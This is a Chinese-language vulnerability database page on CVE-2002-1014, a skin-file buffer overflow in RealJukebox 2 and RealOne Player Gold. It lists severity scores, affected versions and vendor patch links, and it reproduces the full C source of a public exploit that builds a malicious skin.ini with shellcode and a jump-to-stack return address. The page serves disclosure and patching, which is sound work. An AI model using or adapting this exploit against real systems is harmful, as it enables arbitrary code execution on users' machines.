CVE-2002-1014
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:32
NMCOE    

[原文]Buffer overflow in RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary code via an RFS skin file whose skin.ini contains a long value in a CONTROLnImage argument, such as CONTROL1Image.


[CNNVD]Real Networks RealJukebox/RealOne Player Gold外壳文件远程缓冲区溢出漏洞(CNNVD-200210-154)

        
        RealJukebox/Real Player Gold是一款由Real Networks公司开发的拥有强大功能的媒体播放器,支持外壳更换。
        RealJukebox/Real Player Gold在处理skin.ini文件中的"CONTROLnImage"字段时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        RealJukebox/Real Player Gold没有对"skin.ini"中的"CONTROLnImage"字段进行充分检查,攻击者可以在skin.ini文件中提供包含超长文件名作为"CONTROLnImage"字段数据,当RealJukebox/Real Player Gold用户处理这个恶意skin.ini文件时,可导致产生缓冲区溢出,精心构建"CONTROLnImage"字段数据可导致以RealJukebox/Real Player Gold进程的权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:realnetworks:realone_player:6.0.10.505:gold
cpe:/a:realnetworks:realjukebox_2_plus:1.0.2.379
cpe:/a:realnetworks:realjukebox_2:1.0.2.379
cpe:/a:realnetworks:realjukebox_2:1.0.2.340
cpe:/a:realnetworks:realjukebox_2_plus:1.0.2.340

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1014
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1014
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-154
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/843667
(UNKNOWN)  CERT-VN  VU#843667
http://www.securityfocus.com/bid/5217
(VENDOR_ADVISORY)  BID  5217
http://www.iss.net/security_center/static/9538.php
(VENDOR_ADVISORY)  XF  realplayer-rjs-controlnimage-bo(9538)
http://service.real.com/help/faq/security/bufferoverrun07092002.html
(UNKNOWN)  CONFIRM  http://service.real.com/help/faq/security/bufferoverrun07092002.html
http://archives.neohapsis.com/archives/bugtraq/2002-07/0127.html
(UNKNOWN)  BUGTRAQ  20020712 [SPSadvisory#48]RealONE Player Gold / RealJukebox2 Buffer Overflow

- 漏洞信息

Real Networks RealJukebox/RealOne Player Gold外壳文件远程缓冲区溢出漏洞
高危 未知
2002-10-04 00:00:00 2006-01-05 00:00:00
远程  
        
        RealJukebox/Real Player Gold是一款由Real Networks公司开发的拥有强大功能的媒体播放器,支持外壳更换。
        RealJukebox/Real Player Gold在处理skin.ini文件中的"CONTROLnImage"字段时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        RealJukebox/Real Player Gold没有对"skin.ini"中的"CONTROLnImage"字段进行充分检查,攻击者可以在skin.ini文件中提供包含超长文件名作为"CONTROLnImage"字段数据,当RealJukebox/Real Player Gold用户处理这个恶意skin.ini文件时,可导致产生缓冲区溢出,精心构建"CONTROLnImage"字段数据可导致以RealJukebox/Real Player Gold进程的权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Real Networks
        -------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Real Networks RealJukebox 2 for Windows 1.0.2 .379:
        Real Networks Patch skinpfree2.rmp
        
        http://www.service.real.com/help/faq/security/07092002/skinpfree2.rmp

        Real Networks RealJukebox 2 Plus for Windows 1.0.2 .379:
        Real Networks Patch skinpplus2.rmp
        
        http://www.service.real.com/help/faq/security/07092002/skinpplus2.rmp

        Real Networks RealJukebox 2 Plus for Windows 1.0.2 .340:
        Real Networks Patch skinpplus1.rmp
        
        http://www.service.real.com/help/faq/security/07092002/skinpplus1.rmp

        Real Networks RealJukebox 2 for Windows 1.0.2 .340:
        Real Networks Patch skinpfree1.rmp
        
        http://www.service.real.com/help/faq/security/07092002/skinpfree1.rmp

        Real Networks RealOne Player Gold for Windows 6.0.10 .505:
        Real Networks Patch skinpatchr11s.rmp
        
        http://www.service.real.com/help/faq/security/07092002/skinpatchr11s.rmp

- 漏洞信息 (21615)

Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold Skinfile Buffer Overflow (EDBID:21615)
windows remote
2002-07-12 Verified
0 UNYUN
N/A [点击下载]
source: http://www.securityfocus.com/bid/5217/info

Real Software has announced a vulnerability in RealJukebox2 and Real Player Gold.

A buffer overflow condition exists due to insufficient bounds checking of fields in skinfiles. There is an unchecked buffer for the "CONTROLnImage" field of the "skin.ini" file. By supplying an overly long filename as a value for this field, it is possible to overwrite stack variables. An attacker may exploit this condition to overwrite the return address with a pointer to embedded attacker-supplied instructions.

To exploit this issue the attacker must transmit the maliciously constructed skinfile to a victim of the attack. This may be done via a webpage or HTML e-mail. Exploitation of this issue may result in execution of attacker-supplied instructions with the privileges of the user opening the malicious skinfile. 

/*===========================================================
   RealJukebox2 1.0.2.379 Exploit
     for Windows Windows2000 Professional (Service Pack 2)
   The Shadow Penguin Security (http://www.shadowpenguin.org)
   Written by UNYUN (unyun@shadowpenguin.org)
  ============================================================
*/

#include <stdio.h>
#include <windows.h>

#define MAXBUF          4096
#define KERNEL_NAME     "kernel32.dll"
#define SKIN_INI        "skin.ini"
#define INI_FILE \
"[MAIN]\n"\
"Application=RealJukebox\n"\
"Version=2\n"\
"SkinFamilyCount=5\n"\
"\n"\
"CONTROL1Image=%s\n"

#define NOP             0x90
#define FAKE_OFS1       36
#define FAKE_VAL1       0x7FFDF0F0
#define RETADR_OFS      28
#define CODE_OFS        60
#define RETADR_2000pro  0x77e0af64

static unsigned char egg_2000pro[512]={
  0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,
  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD,
  0x00
};

unsigned int search_mem(unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
    unsigned int    adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

void valset(char *buf,unsigned int val)
{
    buf[0]=val&0xff;
    buf[1]=(val>>8)&0xff;
    buf[2]=(val>>16)&0xff;
    buf[3]=(val>>24)&0xff;
}

int main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[MAXBUF];
    unsigned int    tgt,exw;
    unsigned char   *kp;

    if ((fp=fopen(SKIN_INI,"wb"))==NULL){
        printf("Can not write file.\n");
        exit(1);
    }
    memset(buf,NOP,sizeof(buf));
    buf[sizeof(buf)-1]='\0';

    if ((kp=(unsigned char *)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }
    tgt=search_mem(kp,kp+0x100000,0xff,0xe4);
    if (tgt==0) tgt=RETADR_2000pro;
    printf("kp            = 0x%x\n",kp);
    printf("JMP ESP addr  = 0x%x\n",tgt);
    exw=(unsigned int)ExitWindowsEx;
    printf("ExitWindowsEx = 0x%x\n",exw);

    valset(buf+FAKE_OFS1,FAKE_VAL1);
    valset(buf+RETADR_OFS,tgt);
    valset(egg_2000pro+1,exw);
    strncpy(buf+CODE_OFS,egg_2000pro,strlen(egg_2000pro));

    fprintf(fp,INI_FILE,buf);
    fclose(fp);
    printf("Created '%s'.\n",SKIN_INI);
    return(0);
}
		

- 漏洞信息

5036
RealJukebox/RealOne RFS skin.ini CONTROL1Image Handling Overflow
Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2004-04-09 Unknow
2004-04-09 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站